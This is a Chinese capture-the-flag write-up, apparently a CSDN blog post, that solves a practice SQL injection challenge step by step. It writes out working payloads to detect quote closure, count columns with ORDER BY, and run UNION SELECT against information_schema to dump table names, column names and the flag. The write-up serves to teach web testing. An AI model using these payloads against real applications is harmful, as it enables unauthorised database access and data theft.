PTE SQL注入 0websql

本文详细描述了解决一道SQL题目时的步骤,涉及闭合字符检测、列数确定、联合查询和数据提取,最终成功获取flag值。
摘要由CSDN通过智能技术生成

PTE解题思路集合 一道简单的sql手注题目,根据基本流程可以解题

第一步 测试闭合情况

![[Pasted image 20240407091216.png]]

发现存在单引号

1' and 1=1

![[Pasted image 20240407091431.png]]

无回显,存在–+ 或 %23 或 #

1' and 1=1 --+

![[Pasted image 20240407091552.png]]

无正常回显

1' and 1=1 #

![[Pasted image 20240407091803.png]]

有正常回显,可以确定闭合方式是单引号闭合,截断方式是 #

第二步 测试列数(二分法)

先猜测是10列

1' order by 10#

![[Pasted image 20240407092212.png]]

无回显,小于10,根据二分法选取5
![[Pasted image 20240407092252.png]]

依然无回显,小于5,测试 4,3,2,1
![[Pasted image 20240407092334.png]]

有回显,证明表格列数为4

第三步 确定回显位置(联合查询)

-1' union select 1,2,3,4#

![[Pasted image 20240407092520.png]]

第四步 库名、表名、列名、数据逐一查询

查询表名

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

![[Pasted image 20240407092949.png]]

得到回显,找到表名,存在flag表,查找该表中的列名

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='flag'#

![[Pasted image 20240407094006.png]]

找到列名flag,进而查询列中数据

-1' union select 1,2,3,group_concat(flag) from flag#

![[Pasted image 20240407094416.png]]

得到flag,解题完毕 hazel{ea957c27-c198-4d7c-a4e6-7c8d18efa3a1}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值